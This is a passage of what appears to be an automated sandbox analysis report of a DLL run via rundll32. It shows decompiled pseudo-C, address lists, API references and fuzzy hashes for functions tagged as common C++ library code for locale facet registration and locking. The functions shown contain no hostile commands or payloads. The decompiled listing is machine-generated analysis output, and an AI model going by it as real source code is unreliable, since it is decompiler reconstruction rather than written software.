																																					 *0x6e2c6ddc = _t686;
																																					goto L75;
																																				}
																																			} else {
																																				_t686 = _t703;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t685 =  *(_t726 - 0x10);
																																		 *(_t726 - 0x10) = _t685;
																																		 *(_t726 - 4) = 1;
																																		E6E206FD3(__eflags, _t685);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																		 *0x6e2c6db0 = _t685;
																																		goto L68;
																																	}
																																} else {
																																	_t685 = _t702;
																																	goto L68;
																																}
																															}
																														} else {
																															_t684 =  *(_t726 - 0x10);
																															 *(_t726 - 0x10) = _t684;
																															 *(_t726 - 4) = 1;
																															E6E206FD3(__eflags, _t684);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
																															 *0x6e2c6dd8 = _t684;
																															goto L61;
																														}
																													} else {
																														_t684 = _t701;
																														goto L61;
																													}
																												}
																											} else {
																												_t683 =  *(_t726 - 0x10);
																												 *(_t726 - 0x10) = _t683;
																												 *(_t726 - 4) = 1;
																												E6E206FD3(__eflags, _t683);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																												 *0x6e2c6dc4 = _t683;
																												goto L54;
																											}
																										} else {
																											_t683 = _t700;
																											goto L54;
																										}
																									}
																								} else {
																									_t682 =  *(_t726 - 0x10);
																									 *(_t726 - 0x10) = _t682;
																									 *(_t726 - 4) = 1;
																									E6E206FD3(__eflags, _t682);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																									 *0x6e2c6dc8 = _t682;
																									goto L47;
																								}
																							} else {
																								_t682 = _t699;
																								goto L47;
																							}
																						}
																					} else {
																						_t681 =  *(_t726 - 0x10);
																						 *(_t726 - 0x10) = _t681;
																						 *(_t726 - 4) = 1;
																						E6E206FD3(__eflags, _t681);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																						 *0x6e2c6df4 = _t681;
																						goto L40;
																					}
																				} else {
																					_t681 = _t698;
																					goto L40;
																				}
																			}
																		} else {
																			_t680 =  *(_t726 - 0x10);
																			 *(_t726 - 0x10) = _t680;
																			 *(_t726 - 4) = 1;
																			E6E206FD3(__eflags, _t680);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																			 *0x6e2c6df8 = _t680;
																			goto L33;
																		}
																	} else {
																		_t680 = _t697;
																		goto L33;
																	}
																}
															} else {
																_t679 =  *(_t726 - 0x10);
																 *(_t726 - 0x10) = _t679;
																 *(_t726 - 4) = 1;
																E6E206FD3(__eflags, _t679);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																 *0x6e2c6dc0 = _t679;
																goto L26;
															}
														} else {
															_t679 = _t696;
															goto L26;
														}
													}
												} else {
													_t678 =  *(_t726 - 0x10);
													 *(_t726 - 0x10) = _t678;
													 *(_t726 - 4) = 1;
													E6E206FD3(__eflags, _t678);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
													 *0x6e2c6df0 = _t678;
													goto L19;
												}
											} else {
												_t678 = _t695;
												goto L19;
											}
										}
									} else {
										_t677 =  *(_t726 - 0x10);
										 *(_t726 - 0x10) = _t677;
										 *(_t726 - 4) = 1;
										E6E206FD3(__eflags, _t677);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
										 *0x6e2c6dbc = _t677;
										goto L12;
									}
								} else {
									_t677 = _t694;
									goto L12;
								}
							}
						} else {
							_t676 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t676;
							 *(_t726 - 4) = 1;
							E6E206FD3(__eflags, _t676);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
							 *0x6e2c6dec = _t676;
							goto L5;
						}
					} else {
						_t676 = _t693;
						goto L5;
					}
				}
			}






















































                          0x6e20f2cf
                          0x6e20f2cf
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f300
                          0x6e20f305
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F2D6
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F2E0
                          • int.LIBCPMT ref: 6E20F2F7
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F331
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F351
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F36F
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
                          • Instruction ID: 10625688a95a7fcfc8cc82e3f48675f4d5747b483601fc92543ebc04cc0c7c02
                          • Opcode Fuzzy Hash: 2c848cb13beadcee12b9ee0a4465e619a212da20e7d4cf7e2555c4c6c133399c
                          • Instruction Fuzzy Hash: A911E37591055D8FCF00DBE0C894AEEB77BBF44B19F240909E420AB2D0DFB4AA80CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20A1A5, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 71%
                          			E6E20A1A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				void* _v20;
				char _v32;
				void* _t49;
				intOrPtr* _t50;
				void* _t62;
				void* _t75;
				intOrPtr* _t120;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				void* _t138;

				_t99 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653( &_v20, 0);
				_t136 =  *0x6e2c6ccc; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t136;
				_t49 = E6E1E161C(0x6e2c6cb8);
				_t102 = _a8;
				_t50 = E6E1E171B(_a8, _t49);
				_t132 = _t50;
				if(_t50 != 0) {
					L5:
					E6E2066BA( &_v20);
					return E6E220075(_t132);
				} else {
					if(_t136 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E20AA38(__ebx, _t102, __edx, _t132, _t136) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438( &_v32);
							E6E223D74( &_v32, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t132, _t136, 0x14);
							E6E206653( &_v20, 0);
							_t137 =  *0x6e2c6cd0; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t137;
							_t62 = E6E1E161C(0x6e2c6cbc);
							_t109 = _a8;
							_t133 = E6E1E171B(_a8, _t62);
							__eflags = _t133;
							if(_t133 != 0) {
								L12:
								E6E2066BA( &_v20);
								return E6E220075(_t133);
							} else {
								__eflags = _t137;
								if(_t137 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E20AAA0(__ebx, _t109, __edx, _t133, _t137) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438( &_v32);
										E6E223D74( &_v32, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t99, _t133, _t137, 0x14);
										E6E206653( &_v20, 0);
										_t138 =  *0x6e2c6cd4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t138;
										_t75 = E6E1E161C(0x6e2c6cc0);
										_t116 = _a8;
										_t134 = E6E1E171B(_a8, _t75);
										__eflags = _t134;
										if(_t134 != 0) {
											L19:
											E6E2066BA( &_v20);
											return E6E220075(_t134);
										} else {
											__eflags = _t138;
											if(_t138 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E20AB08(_t99, _t116, __edx, _t134, _t138) - 0xffffffff;
												if(__eflags == 0) {
													_t120 =  &_v32;
													E6E1E1438(_t120);
													E6E223D74( &_v32, 0x6e2c3504);
													asm("int3");
													_push(_t120);
													 *((intOrPtr*)(_t120 + 4)) = _v4;
													_v20 = _t120;
													 *_t120 = 0x6e26ba24;
													return _t120;
												} else {
													_t134 = _v16;
													_v16 = _t134;
													_v4 = 1;
													E6E206FD3(__eflags, _t134);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 4))))();
													 *0x6e2c6cd4 = _t134;
													goto L19;
												}
											} else {
												_t134 = _t138;
												goto L19;
											}
										}
									} else {
										_t133 = _v16;
										_v16 = _t133;
										_v4 = 1;
										E6E206FD3(__eflags, _t133);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
										 *0x6e2c6cd0 = _t133;
										goto L12;
									}
								} else {
									_t133 = _t137;
									goto L12;
								}
							}
						} else {
							_t132 = _v16;
							_v16 = _t132;
							_v4 = 1;
							E6E206FD3(__eflags, _t132);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 4))))();
							 *0x6e2c6ccc = _t132;
							goto L5;
						}
					} else {
						_t132 = _t136;
						goto L5;
					}
				}
			}

















                          0x6e20a1a5
                          0x6e20a1ac
                          0x6e20a1b6
                          0x6e20a1bb
                          0x6e20a1c6
                          0x6e20a1ca
                          0x6e20a1cd
                          0x6e20a1d2
                          0x6e20a1d6
                          0x6e20a1db
                          0x6e20a1df
                          0x6e20a224
                          0x6e20a227
                          0x6e20a233
                          0x6e20a1e1
                          0x6e20a1e3
                          0x6e20a1e9
                          0x6e20a1ef
                          0x6e20a1f7
                          0x6e20a1fa
                          0x6e20a237
                          0x6e20a245
                          0x6e20a24a
                          0x6e20a252
                          0x6e20a25c
                          0x6e20a261
                          0x6e20a26c
                          0x6e20a270
                          0x6e20a273
                          0x6e20a278
                          0x6e20a281
                          0x6e20a283
                          0x6e20a285
                          0x6e20a2ca
                          0x6e20a2cd
                          0x6e20a2d9
                          0x6e20a287
                          0x6e20a287
                          0x6e20a289
                          0x6e20a28f
                          0x6e20a295
                          0x6e20a29d
                          0x6e20a2a0
                          0x6e20a2dd
                          0x6e20a2eb
                          0x6e20a2f0
                          0x6e20a2f8
                          0x6e20a302
                          0x6e20a307
                          0x6e20a312
                          0x6e20a316
                          0x6e20a319
                          0x6e20a31e
                          0x6e20a327
                          0x6e20a329
                          0x6e20a32b
                          0x6e20a370
                          0x6e20a373
                          0x6e20a37f
                          0x6e20a32d
                          0x6e20a32d
                          0x6e20a32f
                          0x6e20a335
                          0x6e20a33b
                          0x6e20a343
                          0x6e20a346
                          0x6e20a380
                          0x6e20a383
                          0x6e20a391
                          0x6e20a396
                          0x6e20a39a
                          0x6e20a39e
                          0x6e20a3a3
                          0x6e20a3a6
                          0x6e20a3ad
                          0x6e20a348
                          0x6e20a348
                          0x6e20a34b
                          0x6e20a34f
                          0x6e20a353
                          0x6e20a360
                          0x6e20a368
                          0x6e20a36a
                          0x00000000
                          0x6e20a36a
                          0x6e20a331
                          0x6e20a331
                          0x00000000
                          0x6e20a331
                          0x6e20a32f
                          0x6e20a2a2
                          0x6e20a2a2
                          0x6e20a2a5
                          0x6e20a2a9
                          0x6e20a2ad
                          0x6e20a2ba
                          0x6e20a2c2
                          0x6e20a2c4
                          0x00000000
                          0x6e20a2c4
                          0x6e20a28b
                          0x6e20a28b
                          0x00000000
                          0x6e20a28b
                          0x6e20a289
                          0x6e20a1fc
                          0x6e20a1fc
                          0x6e20a1ff
                          0x6e20a203
                          0x6e20a207
                          0x6e20a214
                          0x6e20a21c
                          0x6e20a21e
                          0x00000000
                          0x6e20a21e
                          0x6e20a1e5
                          0x6e20a1e5
                          0x00000000
                          0x6e20a1e5
                          0x6e20a1e3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20A1AC
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20A1B6
                          • int.LIBCPMT ref: 6E20A1CD
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20A207
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20A227
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20A245
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID:
                          • API String ID: 651022567-0
                          • Opcode ID: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
                          • Instruction ID: 6e44de99da2cb1ebe52b4e5df4bd36382c4cfab6883d3680bdc0eca246e7b81f
                          • Opcode Fuzzy Hash: 8eacfa44a4fc4aa00f51fb43b9a1b091958e26e4a8ed8fe633adb453273c0569
                          • Instruction Fuzzy Hash: 8311E3B690051E9FCF00EBE4C898AEDB77BAF44714F540919E4106B2D0DFB89A45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2046AB, Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 83%
                          			E6E2046AB(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr* _t33;
				void* _t45;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t87;
				void* _t88;

				_t62 = __ebx;
				E6E2200AC(0x6e268144, __ebx, __edi, __esi, 0x14);
				E6E206653(_t88 - 0x14, 0);
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				_t83 =  *0x6e2dce84; // 0x3566150
				 *((intOrPtr*)(_t88 - 0x10)) = _t83;
				_t32 = E6E1E161C(0x6e2dcea8);
				_t65 =  *((intOrPtr*)(_t88 + 8));
				_t33 = E6E1E171B( *((intOrPtr*)(_t88 + 8)), _t32);
				_t86 = _t33;
				if(_t33 != 0) {
					L5:
					E6E2066BA(_t88 - 0x14);
					return E6E220075(_t86);
				} else {
					if(_t83 == 0) {
						_push( *((intOrPtr*)(_t88 + 8)));
						_push(_t88 - 0x10);
						__eflags = E6E204FCE(__ebx, _t65, __edx, _t83, _t86) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t88 - 0x20);
							E6E223D74(_t88 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26816f, __ebx, _t83, _t86, 0x18);
							E6E206653(_t88 - 0x14, 0);
							 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
							_t84 =  *0x6e2dce7c; // 0x3569090
